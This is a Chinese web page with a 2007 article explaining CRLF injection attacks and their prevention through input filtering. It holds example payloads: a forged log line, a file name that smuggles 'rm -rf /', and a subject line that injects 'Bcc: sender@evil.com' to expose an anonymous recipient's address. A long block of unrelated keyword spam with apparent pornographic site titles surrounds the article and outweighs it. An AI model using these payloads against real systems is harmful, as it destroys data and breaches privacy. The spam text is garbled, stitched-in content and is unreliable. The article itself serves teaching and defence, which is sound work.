国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關(guān)注微信公眾號(hào)

黑客技術(shù):CRLF注入攻擊原理和防范措施
2007-01-23   

CRLF的含義是“carriage return/line feed”,意思就是回車。這是兩個(gè)ASCII字符,分別排在第十三和第十位。CR和LF是在計(jì)算機(jī)終端還是電傳打印機(jī)的時(shí)候遺留下來的東西。電傳打字機(jī)就像普通打字機(jī)一樣工作。在每一行的末端,CR命令讓打印頭回到左邊。LF命令讓紙前進(jìn)一行。雖然使用卷紙的終端時(shí)代已經(jīng)過去了,但是,CR和LF命令依然存在,許多應(yīng)用程序和網(wǎng)絡(luò)協(xié)議仍使用這些命令作為分隔符。

攻擊者在搜索安全漏洞的時(shí)候沒有忽略很少使用的CRLF。攻擊者可以通過在一段數(shù)據(jù)中加入CRLF命令來改變接受這個(gè)數(shù)據(jù)的應(yīng)用程序處理這個(gè)數(shù)據(jù)的方式,從而執(zhí)行CFRL注入攻擊。

CRLF攻擊最基本的例子包括向記錄文件中增加偽造的記錄。也就是說,有安全漏洞的應(yīng)用程序把一個(gè)用戶輸入的內(nèi)容寫到系統(tǒng)記錄文件中。攻擊者可以提供如下輸入內(nèi)容:

Testing123MYSQL DATABASE ERROR: TABLE CORRUPTION

當(dāng)系統(tǒng)管理員在早上查看他的紀(jì)錄時(shí),他可能會(huì)用很多時(shí)間排除一個(gè)根本就不存在的故障。狡猾的攻擊者在攻擊系統(tǒng)的另一部分時(shí),可以使用這種特洛伊木馬分散管理員的注意力。

想像一下,一個(gè)應(yīng)用程序收到用戶輸入的一個(gè)文件名,然后對(duì)那個(gè)文件執(zhí)行一個(gè)指令,如“l(fā)s -a .”。如果這個(gè)應(yīng)用程序存在CRLF安全漏洞,攻擊者就可以輸入這樣的內(nèi)容:

File.txtrm -rf /

這個(gè)有安全漏洞的應(yīng)用程序就會(huì)執(zhí)行這個(gè)命令“l(fā)s -a File.txt”,然后再執(zhí)行這個(gè)命令“rm -rf /”。如果這個(gè)應(yīng)用程序是一個(gè)根程序,這可能就是它執(zhí)行的最后一個(gè)命令,因?yàn)樵诟謪^(qū)的全部文件都被刪除了。

考慮使用一種CRFL注入攻擊暴露使用一種基于網(wǎng)絡(luò)的匿名電子郵件系統(tǒng)的某個(gè)人的電子郵件地址。那個(gè)電子郵件系統(tǒng)的工作方式可能是這樣的:電子郵件的發(fā)送者用他們的電子郵件地址、信息主題和信息本身填寫一個(gè)表格。當(dāng)這個(gè)表格遞交到網(wǎng)絡(luò)服務(wù)器上的時(shí)候,網(wǎng)絡(luò)服務(wù)器把這個(gè)表格轉(zhuǎn)換為一個(gè)SMTP電子郵件,并且發(fā)送給收件人。發(fā)送者永遠(yuǎn)不會(huì)看到收件人的電子郵件地址。這個(gè)地址只有服務(wù)器知道。

如果這個(gè)應(yīng)用程序存在CRLF攻擊安全漏洞,電子郵件的發(fā)件人可以通過創(chuàng)建下面這樣的一行主題來破壞收件人的匿名性:

Subject: Peekaboo, I see youBcc: sender@evil.com

當(dāng)有安全漏洞的應(yīng)用程序得到這個(gè)數(shù)據(jù)的時(shí)候,它向這個(gè)郵件的文件頭增加一個(gè)不需要的行,創(chuàng)建一個(gè)發(fā)送到發(fā)件人郵件地址的這封郵件的盲送副本。在這個(gè)副本中,“To:”地址是看不到的,因此把收件人的郵件地址暴露給發(fā)送者。

使用良好的編程技術(shù)能夠避免包括CRLF攻擊在內(nèi)的注入攻擊。要使你的應(yīng)用程序不受CRFL注入攻擊,需要你保持與防御SQL注入攻擊等其它類型的注入攻擊一樣的警惕性:永遠(yuǎn)不要相信輸入的內(nèi)容!在你控制范圍以外的任何來源的輸入內(nèi)容都必須要進(jìn)行檢查,在你的應(yīng)用程序?qū)?shù)據(jù)執(zhí)行操作之前,任何不符合預(yù)期的數(shù)據(jù)類型的字符都要?jiǎng)h除。例如,如果你期待著一個(gè)電子郵件主題行,這個(gè)數(shù)據(jù)中的所有的字符都應(yīng)該是字母、數(shù)字和標(biāo)點(diǎn)符號(hào)。如果你的應(yīng)用程序期待著一個(gè)文件名,這個(gè)數(shù)據(jù)中只能包含合法地在文件名中使用的字符。如果程序員在這兩個(gè)例子的情況下簡(jiǎn)單地過濾掉CR和LF字符,這個(gè)攻擊就失敗了。

用戶輸入是“壞字符”的一個(gè)來源。但是,你不要忘記檢查你從來沒有編寫過的其它程序輸入的內(nèi)容。在許多情況下,攻擊者可以把一個(gè)注入攻擊從一個(gè)有漏洞的應(yīng)用程序轉(zhuǎn)移到一個(gè)基本的例行程序中。程序員不會(huì)檢查基本的例行程序中的數(shù)據(jù),因?yàn)槟抢锏臄?shù)據(jù)不是直接來自于用戶。你要把任何你不能跟蹤到可信賴的來源的數(shù)據(jù)都當(dāng)作被感染的數(shù)據(jù)。這樣,你就安全了。

責(zé)任編輯 趙毅 zhaoyi#51cto.com TEL:(010)68476636-8001


熱詞搜索:

上一篇:簡(jiǎn)單幾招徹底防御熊貓燒香(圖)
下一篇:高手談Windows XP中磁盤的分區(qū)應(yīng)用

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
国产亚洲一区二区在线观看| 日韩三级精品电影久久久| 天天影视涩香欲综合网| 在线成人高清不卡| 成人福利在线看| 亚洲国产va精品久久久不卡综合| 欧美一区日韩一区| 国产精品一区二区在线观看不卡 | 国产精品1024久久| 国产精品三级av| 欧美一级夜夜爽| 色综合久久六月婷婷中文字幕| 人人狠狠综合久久亚洲| 亚洲老司机在线| 国产三级精品三级在线专区| 欧美日韩亚州综合| 韩日av一区二区| 日韩av电影免费观看高清完整版| 国产精品欧美极品| 精品日韩在线观看| 宅男在线国产精品| 91久久精品网| 成人丝袜视频网| 久久精品国产色蜜蜜麻豆| 偷拍自拍另类欧美| 亚洲人亚洲人成电影网站色| 久久这里都是精品| 7878成人国产在线观看| 欧美日韩国产成人在线91| 日韩电影免费在线看| 国产精品久久久99| 国产精品免费观看视频| 欧美videofree性高清杂交| 欧美三级日韩在线| 国产成人av一区二区| 国产一区二区免费在线| 老司机免费视频一区二区 | 一区二区三区日韩| 国产亚洲制服色| 精品国产一区久久| 欧美一级夜夜爽| 欧美mv和日韩mv的网站| 欧美一区二区女人| 51精品久久久久久久蜜臀| 色一情一乱一乱一91av| 欧美系列在线观看| 欧美专区在线观看一区| 色婷婷国产精品久久包臀| 日韩激情一二三区| 久草在线在线精品观看| 麻豆精品国产传媒mv男同 | 日韩电影在线一区二区三区| 亚洲乱码精品一二三四区日韩在线| 亚洲欧洲精品一区二区精品久久久 | 成人综合日日夜夜| 丁香啪啪综合成人亚洲小说 | 9久草视频在线视频精品| 国产在线播精品第三| 韩国成人精品a∨在线观看| 亚洲在线一区二区三区| 亚洲综合在线第一页| 亚洲成人激情av| 日韩成人dvd| 久久99最新地址| 国产一区二区美女诱惑| 久久国产精品无码网站| 高清视频一区二区| 99精品视频在线播放观看| 91色在线porny| 成人av动漫在线| 在线观看亚洲专区| 91精品福利在线一区二区三区 | 亚洲影院理伦片| 亚洲va国产天堂va久久en| 麻豆精品蜜桃视频网站| 国产最新精品免费| 成年人国产精品| 欧洲中文字幕精品| 久久久亚洲综合| ...av二区三区久久精品| 亚洲午夜精品在线| 国产一区二区免费看| 91影院在线免费观看| 欧美日本精品一区二区三区| 精品捆绑美女sm三区| 亚洲色图在线播放| 免费在线看成人av| 成人毛片视频在线观看| 91麻豆精东视频| 精品久久国产字幕高潮| 国产精品久久久久桃色tv| 亚洲成人在线网站| 国产一区二区三区综合| 在线中文字幕一区二区| 欧美一区二区二区| 国产精品国产三级国产aⅴ原创| 亚洲欧美另类在线| 裸体一区二区三区| 99re在线视频这里只有精品| 欧美在线免费视屏| 久久久精品国产免大香伊| 亚洲精品一卡二卡| 国内外精品视频| 欧美日高清视频| 国产欧美日韩亚州综合 | 99re这里只有精品首页| 欧美体内she精高潮| 国产精品嫩草久久久久| 日韩av一区二区三区四区| 成人高清免费观看| 色欧美乱欧美15图片| 久久亚洲精品小早川怜子| 亚洲综合在线免费观看| 国产成人午夜精品5599| 欧美性猛交一区二区三区精品| 26uuu欧美| 视频在线在亚洲| av电影在线不卡| 国产日韩欧美一区二区三区乱码| 丝袜美腿成人在线| 一本一本大道香蕉久在线精品| 欧美国产成人在线| 国产一区二区日韩精品| 欧美va亚洲va在线观看蝴蝶网| 午夜久久久久久| 欧美日韩午夜在线视频| 亚洲韩国一区二区三区| 一本一道综合狠狠老| 日韩电影在线观看一区| 欧美日韩一区二区三区四区五区| 亚洲免费av在线| 色婷婷久久久亚洲一区二区三区| 中文字幕高清不卡| av午夜一区麻豆| 国产精品久久久久婷婷| 99久久免费国产| √…a在线天堂一区| 色综合久久久久| 亚洲精品网站在线观看| 欧美在线观看禁18| 亚洲r级在线视频| 欧美精品在线一区二区| 奇米在线7777在线精品 | 亚洲日本在线观看| 色综合天天在线| 亚洲一区二区高清| 欧美日韩国产另类不卡| 免费在线观看一区二区三区| 欧美成人a视频| 国产成人免费网站| **欧美大码日韩| 欧美色图激情小说| 免费日本视频一区| 久久久国产午夜精品| eeuss国产一区二区三区| 亚洲欧美国产毛片在线| 欧美性受xxxx黑人xyx性爽| 日韩极品在线观看| 久久精品一区二区三区不卡| 99精品视频在线观看免费| 亚洲成a人片在线不卡一二三区| 91精品啪在线观看国产60岁| 精品无人码麻豆乱码1区2区| 国产精品每日更新| 欧美日韩一级二级| 国产一区二区三区| 一区二区三区四区高清精品免费观看| 欧美日韩日本视频| 国内精品伊人久久久久av影院 | 99久久精品费精品国产一区二区| 亚洲乱码国产乱码精品精的特点| 欧美日韩在线三区| 狠狠久久亚洲欧美| 亚洲美女屁股眼交3| 日韩午夜三级在线| 成人激情综合网站| 亚洲mv在线观看| 中文字幕av一区二区三区高| 欧美视频一区在线观看| 国产电影一区在线| 亚洲一区中文日韩| 久久综合资源网| 欧美日韩中文字幕一区| 国产成人免费在线观看| 婷婷开心激情综合| 亚洲国产精品精华液2区45| 欧美高清一级片在线| 成人av在线网| 精品一区二区三区在线播放视频| 亚洲免费观看高清完整版在线观看| 日韩一区二区免费视频| 91网站黄www| 韩国视频一区二区| 亚洲国产一区二区a毛片| 国产精品素人视频| 日韩欧美综合一区| 欧美性受xxxx| www.欧美日韩国产在线| 紧缚捆绑精品一区二区| 日韩电影免费一区|